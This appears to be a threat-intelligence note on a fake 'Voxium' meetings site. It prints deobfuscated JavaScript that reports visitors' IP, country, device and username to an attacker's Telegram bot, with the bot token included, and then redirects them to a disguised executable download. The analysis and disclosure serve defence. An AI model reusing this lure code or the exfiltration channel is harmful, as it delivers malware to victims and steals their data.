# Traffer Sample 2024 - 12 - 06 deobfuscated sample from voxiumcalls 2024 - 12 - 06 - https://urlscan.io/result/bb84fc45-c42d-4192-a20e-8e760740e403/#transactions - url: hxxps[://]voxiumcalls[.]com/room/dev/secr[.]js - sender @ReaperCrpt on twitter - code from filename: secr[.]js - https://urlscan.io/result/9ddf69a0-00fd-46d7-b5e4-4c836fc0cf72/dom/ - payload 1: https://www.filescan.io/uploads/675360c8aa7f098f77e804bc/reports/fa4533d3-33e1-41dc-b594-8302c363d201/overview - payload 2: https://www.filescan.io/uploads/675360e4f158f0b6a3b2e82a/reports/e0ef806f-2655-4422-ab0e-bf0ce3c39cc8/overview ## telegram data: ```js async function sendTelegramNotification(_0xfee1e1) { const _0x3aa37f = "7035066518:AAEiKOY_kY8zNWnsH0ik7FxC_fLrcfvS__Q"; const _0x1d5040 = "-1002259143048"; ``` | Status | ID | Username | First Name | Advanced Info | Permissions | | ------ | ---------- | ------------ | ---------- | ------------- |:----------- | | 200 | 7035066518 | voxcodes_bot | voxcodes | N/A | | ## code ```js document[.]addEventListener("DOMContentLoaded", function () { let _0x57b8dc = null; const _0x226aed = document[.]querySelector(".closeit"); const _0x180a80 = document[.]querySelector(".modal_codes"); _0x226aed.addEventListener("click", () => { _0x180a80.classList[.]add("hidden"); }); document[.]getElementById("codeForm").addEventListener("submit", async function (_0x53aa69) { _0x53aa69.preventDefault(); const _0x1880f6 = document[.]getElementById("code").value; try { let _0x18032f = await fetch("process[.]php", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: new URLSearchParams({ code: _0x1880f6 }) }); let _0xddaf37 = await _0x18032f.json(); _0x57b8dc = _0xddaf37.usercode || "UnknownUser"; if (_0x57b8dc === "NotFound") { console[.]error("Usercode not found in the database"); _0x57b8dc = "UnknownUser"; } } catch (_0x2f58a7) { console[.]error("Error:", _0x2f58a7); } }); document[.]querySelectorAll(".downloadLink").forEach(_0x16b6ab => { _0x16b6ab.addEventListener("click", async function (_0x1188fd) { _0x1188fd.preventDefault(); if (_0x57b8dc) { await sendTelegramNotification(_0x57b8dc); const _0x2270f5 = navigator[.]platform[.]indexOf("Win") > -1; const _0x1cb268 = _0x2270f5 ? "hxxps[://]www[.]dropbox[.]com/scl/fi/j2942ad5hlnheby7pc2rz/Voxium-Meetings[.]exe?rlkey=5vxdh3tx3fhh9aqmq1ujdqrns&st=hc267s5f&dl=1" : "hxxps[://]tokenframegovernance[.]com/kusaka[.]php?call=av"; window[.]location[.]href = _0x1cb268; } else { console[.]error("Usercode is not available"); } }); }); }); async function sendTelegramNotification(_0xfee1e1) { const _0x3aa37f = "7035066518:AAEiKOY_kY8zNWnsH0ik7FxC_fLrcfvS__Q"; const _0x1d5040 = "-1002259143048"; try { const { userIpAddress: _0x220c01, country: _0x3d6901 } = await getUserIpAddressAndCountry(); const _0x41d15c = getUserDeviceInfo(); const _0x4a6a39 = getCurrentTime(); const _0x260429 = "\n*#Download Vox* \n\n*IP*: `" + _0x220c01 + "`\n*Country*: `" + _0x3d6901 + "`\n*Device*: `" + _0x41d15c + "`\n*Username*: @" + _0xfee1e1 + "\n*Time*: `" + _0x4a6a39 + "`\n"; const _0x415308 = "hxxps[://]api[.]telegram[.]org/bot" + _0x3aa37f + "/sendMessage"; const _0x1c8b24 = { chat_id: _0x1d5040, text: _0x260429, parse_mode: "Markdown" }; await fetch(_0x415308, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON[.]stringify(_0x1c8b24) }); console[.]log("Уведомление в Telegram успешно отправлено:", _0x260429); } catch (_0x216ea9) { console[.]error("Ошибка отправки уведомления в Telegram:", _0x216ea9); } } async function getUserIpAddressAndCountry() { try { const _0x3b477 = await fetch("hxxps[://]ipinfo[.]io/json?token=41c9400467d8df"); if (!_0x3b477.ok) { throw new Error("Не удалось получить данные от сервера."); } const _0x375e4b = await _0x3b477.json(); return { userIpAddress: _0x375e4b.ip, country: _0x375e4b.country }; } catch (_0x226010) { console[.]error("Ошибка получения IP и страны:", _0x226010); return { userIpAddress: "Unknown", country: "Unknown" }; } } function getUserDeviceInfo() { const _0x171b67 = getBrowserName(); const _0x3dc6a3 = navigator[.]platform; const _0x476fdc = _0x3dc6a3 + ", " + _0x171b67 + ", " + window[.]screen[.]width + "x" + window[.]screen[.]height; return _0x476fdc; } function getBrowserName() { const _0x2da47f = navigator[.]userAgent; if (_0x2da47f.indexOf("Firefox") > -1) { return "Firefox"; } else if (_0x2da47f.indexOf("Opera") > -1 || _0x2da47f.indexOf("OPR") > -1) { return "Opera"; } else if (_0x2da47f.indexOf("Trident") > -1) { return "Internet Explorer"; } else if (_0x2da47f.indexOf("Edge") > -1) { return "Edge"; } else if (_0x2da47f.indexOf("Chrome") > -1) { return "Chrome"; } else if (_0x2da47f.indexOf("Safari") > -1) { return "Safari"; } else { return "Unknown"; } } function getCurrentTime() { const _0x476b76 = new Date(); const _0x2b9c28 = _0x476b76.getHours().toString().padStart(2, "0"); const _0x3bb7d5 = _0x476b76.getMinutes().toString().padStart(2, "0"); const _0x254432 = _0x476b76.getSeconds().toString().padStart(2, "0"); return _0x2b9c28 + ":" + _0x3bb7d5 + ":" + _0x254432; } ```